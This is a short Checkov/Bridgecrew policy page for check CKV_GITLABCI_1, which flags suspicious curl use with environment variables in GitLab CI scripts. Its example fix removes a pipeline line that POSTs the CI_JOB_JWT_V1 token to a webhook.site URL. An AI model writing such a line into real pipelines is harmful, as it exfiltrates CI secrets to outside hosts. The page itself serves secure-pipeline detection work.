Suspicious use of curl with CI environment variables in script

Error: Suspicious use of curl in a GitLab CI environment
Bridgecrew Policy ID: BC_REPO_GITLAB_CI_1
Checkov Check ID: CKV_GITLABCI_1
Severity: LOW

Ensure that there are no suspicious uses of curl with CI environment variables in script

Description

Using curl with environment variables could be an attempt to exfiltrate secrets from a pipeline. Investigate if the use of curl is appropriate and secure.

Example Fix

Block code and remove code that attempts to exfiltrate secrets.

deploy:
-  script: 'curl -H \"Content-Type: application/json\" -X POST --data "$CI_JOB_JWT_V1" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826'